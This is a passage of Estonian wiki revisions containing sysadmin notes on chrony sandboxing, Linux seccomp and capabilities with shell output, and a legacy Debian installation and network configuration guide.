Leap status : Normal
</pre>

===Kasulikud lisamaterjalid===

* TODO

Chrony

2026-05-03T23:11:23Z

Imre: /* Misc - chrony protsess */

===Sissejuhatus===

TODO

===Tööpõhimõte===

TODO

===Misc - chrony protsess===

chronyd protsessi info

<pre>
root@pve-svc-02:~# pgrep chronyd
1436092
1436093
root@pve-svc-02:~# lsns -p 1436093
NS TYPE NPROCS PID USER COMMAND
4026531833 net 481 1 root /sbin/init
4026531834 time 481 1 root /sbin/init
4026531835 cgroup 481 1 root /sbin/init
4026531836 pid 481 1 root /sbin/init
4026531837 user 481 1 root /sbin/init
4026531839 ipc 481 1 root /sbin/init
4026533035 mnt 2 1436092 _chrony ├─/usr/sbin/chronyd -F 1
4026533036 uts 2 1436092 _chrony └─/usr/sbin/chronyd -F 1
</pre>

kus

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep -i seccomp
Seccomp: 2
Seccomp_filters: 23

root@pve-svc-02:~# nsenter -m -t 1436092 findmnt | grep inacc | sed -r 's/tmpfs\s+.*//'
│ └─/dev/kmsg tmpfs[/systemd/inaccessible/chr]
│ ├─/run/credentials tmpfs[/systemd/inaccessible/dir]
│ ├─/run/user tmpfs[/systemd/inaccessible/dir]
├─/root tmpfs[/systemd/inaccessible/dir]
├─/home tmpfs[/systemd/inaccessible/dir]
├─/usr/lib/modules tmpfs[/systemd/inaccessible/dir]
</pre>

ning capabilities

<pre>
root@pve-svc-02:~# pscap -p 1436092
ppid pid uid command capabilities
1 1436092 _chrony chronyd net_bind_service, sys_time +

root@pve-svc-02:~# pscap -p 1436093
ppid pid uid command capabilities
1436092 1436093 _chrony chronyd net_bind_service, sys_time +
</pre>

ning systemd vastavad seadistused

<pre>
root@pve-svc-02:~# systemctl show chrony | egrep "^Prot|^Priv|^Capab" | egrep "restore$|yes$"
CapabilityBoundingSet=cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_fsetid cap_setgid cap_setuid cap_setpcap cap_net_bind_service cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock cap_ipc_owner cap_sys_nice cap_sys_resource cap_sys_time cap_setfcap cap_perfmon cap_bpf cap_checkpoint_restore
PrivateTmp=yes
ProtectKernelTunables=yes
ProtectKernelModules=yes
ProtectKernelLogs=yes
ProtectControlGroups=yes
ProtectControlGroupsEx=yes
ProtectHome=yes
ProtectHostname=yes
</pre>

===Misc - chrony teenus===

Seadistus

<pre>
root@pve-svc-02:~# egrep "pool|server" /etc/chrony/chrony.conf
# pool 2.debian.pool.ntp.org iburst

root@pve-svc-02:~# cat /etc/chrony/sources.d/local-ntp-server.sources
server 10.192.0.53 iburst
</pre>

sources info

<pre>
root@pve-svc-02:~# chronyc sources -v -n

.-- Source mode '^' = server, '=' = peer, '#' = local clock.
/ .- Source state '*' = current best, '+' = combined, '-' = not combined,
| / 'x' = may be in error, '~' = too variable, '?' = unusable.
|| .- xxxx [ yyyy ] +/- zzzz
|| Reachability register (octal) -. | xxxx = adjusted offset,
|| Log2(Polling interval) --. | | yyyy = measured offset,
|| \ | | zzzz = estimated error.
|| | | \
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* 10.192.0.53 4 9 377 413 -135us[ -216us] +/- 3171us
</pre>

tracking info

<pre>
root@pve-svc-02:~# chronyc tracking
Reference ID : 0AC00035 (10.192.0.53)
Stratum : 5
Ref time (UTC) : Sun May 03 17:25:18 2026
System time : 0.000016197 seconds slow of NTP time
Last offset : -0.000080330 seconds
RMS offset : 0.000049475 seconds
Frequency : 0.712 ppm fast
Residual freq : -0.006 ppm
Skew : 0.085 ppm
Root delay : 0.006004042 seconds
Root dispersion : 0.000445185 seconds
Update interval : 517.6 seconds
Leap status : Normal
</pre>

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-03T22:52:01Z

Imre: /* Tööpõhimõte */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt (käigult konstrueeritakse efektiivselt sobivad capacitid)
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-03T22:45:28Z

Imre: /* Kasulikud lisamaterjalid */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Operatsioonisüsteemi Debian GNU/Linux kasutamine

2026-05-03T22:45:16Z

Imre: /* seccomp */

===Debian GNU/Linux===

Debian GNU/Linux ehk lühidalt Debian on vaba operatsioonisüsteem, mis kasutab Linux või FreeBSD tuuma ning töötab paljudel populaarsetel riistvaralistel platvormidel, sealhulgas 32 bit ja 64 bit x86 arvutid.

Debiani sobib kasutada nii serveritel kui ka töökohaarvutitel sh süleritel. Debianile on iseloomulik

* korrektselt ilmuvad turvaparandused (teated ilmuvad ka bugtraqis)
* eeskujulik paketihaldus, sh automaatne pakettide autentsuse valideerimine kontrollsummade abil (MD5sum, SHA1, SHA256)
* rahulik stabiilsete versioonide ilmumise tsükkel, erinevalt närvilisest ja suhteliselt pikk tugi eelmisele stabiisele versioonile
* väärikas kasutajaskond (ingl. k. community)
* tarkvara jagatakse kompileeritud ja lähtetekstipakettide kujul

Debiani kodulehe http://www.debian.org/ tiitel ütleb, et tegemist on universaalse operatsioonisüsteemiga, mille tunnistuseks on ehk tõepoolest asjaolu, et Debiani on kasutatud mitmete teiste nn Linuxi distributsioonide aluseks.

Debian on loodud Ian Murdock'i poolt aastal 1993, kusjuures operatsioonisüsteemi nimi on tuletatud autori ja tema abikaasa Debra eesnimedest.

===Operatsioonisüsteemi paigaldamise ettevalmistamine===

Debiani kasutamiseks on vajalik sobiv riistvara, näiteks tõenäoliselt praktiliselt suvaline 32 bit või 64 bit x86 arvuti sobib, alatest 486 PC mudelitest kuni HP DL 585 G5 ja IBM x3250 taoliste serveriteni. Riistvara sobivuse määrab põhiliselt operatsioonisüsteemi tuum, 2013 aastal on stabiilsel Debiani versioonil 7.0 selleks Linux tuuma versioon 3.2.0.

Lisaks tuleks enne operatsioonisüsteemi paigaldamist otsutada, mida arvutiga teha soovitakse, sh võiks kujutada ette milline saab olema

* arvuti nimi ja ip aadress
* kõvaketaste kasutus
* kas arvutit kasutatakse serveri või töökohana
* kuhu arvuti füüsiliselt paigutatakse
* kes vastutab arvuti haldamise eest (tarkvara uuendamine, süsteemi monitoorimine ja varundus/taaste)

Üks otsekohene moodus operatsioonisüsteemi paigladmiseks on kasutada Debiani peeglites (ingl. k. mirror) jagatavat CD tõmmisest valmistatud bootivat CD plaati, kuna kõige populaarsem platvorm on x86, siis märgime, et

* 64 bit AMD ja Inteli arvutitel kasutamiseks sobib Debiani amd64 arhitektuur
* 32 bit AMD ja Inteli arvutitel kasutamiseks sobib Debaini i386 arhitektuur

Kuivõrd reeglina AMD ja Inteli 64 bit arvutid on 32 bit-ühilduvad, siis kasutades 32 bit operatsioonisüsteemi tarkvara 64 bit riistvaral käitub arvuti nagu 32 bitine arvuti. Kuigi eelpool on mainitud nimeliselt AMD ja Intelit kehtib öeldu ka teiste tootjate x86 platvormide kohta. Järgnevas on näited toodud konkreetsuse huvides 64 bit keskkonna kohta, kuid põhimõtteliselt toimub tegevus samamoodi ka 32 bit keskkonnas toimetades. Lisaks saab valida mitmete nö eriotstarbeliste tuumade hulgast, nt i386 non-pae, tuuma nimes kasutatakse '486' sel juhul.

Niisiis, kui kasutada on 64 bit x86 riistvara tuleks kopeerida esimene amd64 arhitektuuri CD tõmmis, näiteks aadressilt http://cdimage.debian.org/debian-cd/7.0.0/amd64/iso-cd/debian-7.0.0-amd64-CD-1.iso ning kirjutada CD plaadile. Plaadi kirjutamisel peab jälgima, et tõmmist ei kirjutata plaadile mitte nagu suurt faili, vaid kirjutatakse tõmmisena, vastasel korral arvuti ei boodi sellelt plaadilt. Debian v. 7.0 on rangelt eristatud vabad ja suletud koodiga draiverid, kõige nähtavamalt mõjutab see tõenäoliselt operatsioonisüsteemi paigaldamise protseduur kui on tegemist vastava riistvaraga, http://www.debian.org/releases/stable/amd64/ch06s04.html.en.

USB pulgalt paigaldades tundub, et uuemal ajal on .iso tõmmised nii ettevalmistatud (isohybrid techniques), et need saab lihtsalt dd programmiga kopeerida pulgale ja töötab, https://wiki.debian.org/BootUsb

# dd if=/tmp/debian-7.0.0-amd64-CD-1.iso of=/dev/sdc bs=4M

Kui Debian paigaldatakse arvutile, kus juba on operatsioonisüsteem installeritud, nt Win7, siis tõenäoliselt õnnestub installeriga töötamise ajal Win7 failisüsteemide ja partitsioonide suurusi kahandada, tehes nii ruumi Debiani jaoks. Selleks tuleb kõvaketta seadistamise menüüvalikus öelda 'Manual' ja sealt edasi. Kirjanduse põhjal saab öelda, et vastvaid NTFS failisüsteeme ei ole tarvis eelnevalt defragmenteerida.

Windows operatsioonisüsteemi all sobib USB pulk tekitada UUI (Universal USB Installer) programmiga, mille kasutamise juhised leiab aadressilt http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/.

===Operatsioonisüsteemi paigaldamine===

Tuleb arvestada, et operatsioonisüsteemi paigaldamisel hävivad eelnevalt kõvaketastel olnud andmed. Peale paigaldusmeedialt arvuti käivitamist käivitatakse automaatselt operatsioonisüsteemi installer, mis näeb tekstrežiimis välja selline (alternatiivina esineb installeri kasutajaliides ka graafilises vormis)

[[Pilt:Debian-installer-v7.gif]]

Installeri kasutamine on intuatiivne, paigaldamise tulemusena tekib iseseisvalt bootiv arvuti. Paigaldamise käigus sooritatakse järgmised otsustused ja tegevused

* kõvaketakste kasutamine
* võrguseadistused
* tarkvarakomplekti valik (standard, töökoht, server)
* juurkasutaja parool
* paigaldatakse alglaadur (ingl. k. bootloader) GRUB

Peale paigaldamist saab arvutisse konsoolilt sisse logida ja teatatakse midagi sellist

Linux loomaaed 2.6.26-2-xen-686 #1 SMP Wed May 16 23:50:09 UTC 2009 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 29 23:06:53 2009 from aix.auul
mart@loomaaed:~$

Oluline on tähale panna, et muu hulgas räägib Debian oma kasutustingimustest

* Debian GNU/Linux süsteemis sisalduv tarkvara on vaba tarkvara
* Debian GNU/Linux süsteemil kasutamisega ei kaasne garantiid

Paigaldamise lõpus küsitakse, kas on soov osaleda nn populaarsus-võistluses, kord nädalas hakkab arvuti saatma paigaldatud pakettide nimekirja arendajatele, tulemused avaldadakse aadressil http://popcon.debian.org/.

===Operatsioonisüsteemi paigaldamine üle serial konsooli===

Serial konsooli eksitab splash, sellest saab lahti vajutades Esc. Seejärel tuleb sisestada

boot: install console=ttyS0,9600

===Community===

Debian GNU/Linux osas suhtlemiseks või niisama tutvumiseks saab kasutada selliseid ressursse

* Veebikoht - http://www.debian.org/
* Wiki - http://wiki.debian.org/
* Postiloendid asuvad aadressil http://lists.debian.org/
* Uudised - http://www.debian.org/News/project/
* Turvaparandusi puudutavad teadaanded - http://www.debian.org/security/

===Operatsioonisüsteemi varundamine ja taaste===

Operatsioonisüsteemi varundamiseks sobib kasutada programmi rsync kopeerides kogu failisüsteemi va kataloogid

* /tmp
* /proc
* /sys

teisele arvutile.

Süsteemi taastamiseks tuleb arvuti bootida nt RIP-Linuxi CD plaadilt, seadistada võrk, kopeerida varundatud süsteem ja paigaldada bootloader.

===IP aadress===

Staatilise IP aadressi saab Debianile seadistada failist

/etc/network/interfaces

Tüüpiliselt võiks see välja näna järgnev

# The loopback interface
auto lo
iface lo inet loopback

# The first network card - this entry was created during the Debian installation
# (network, broadcast and gateway are optional)
auto eth0

iface eth0 inet static
address 192.168.1.10
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

===Arvuti nimi ja resolver===

Arvutil peab oleme korrektselt seadistatud nimi ning nimesüsteemi kasutamine. Arvuti nimi on kirjas failis /etc/hostname, näiteks

bassein

ning failis /etc/hosts on kirjas nö staatiline nimelahendus, mis töötab päri-ja pöördteisenduse jaoks, lihtsal juhul on seal sellised read (kusjuures esimest rida tuleb kasutada sõna-sõnalt)

127.0.0.1 localhost.localdomain localhost
192.168.1.20 bassein.loomaaed.tartu.ee bassein

Peale nende failide sisu muutmist tuleb muudatuste kehtestamiseks öelda

bash# hostname bassein

Õnnestunud muudatuse kinnituseks ütleb arvuti nii

bash# hostname
bassein
bash# hostname -f
bassein.loomaaed.tartu.ee

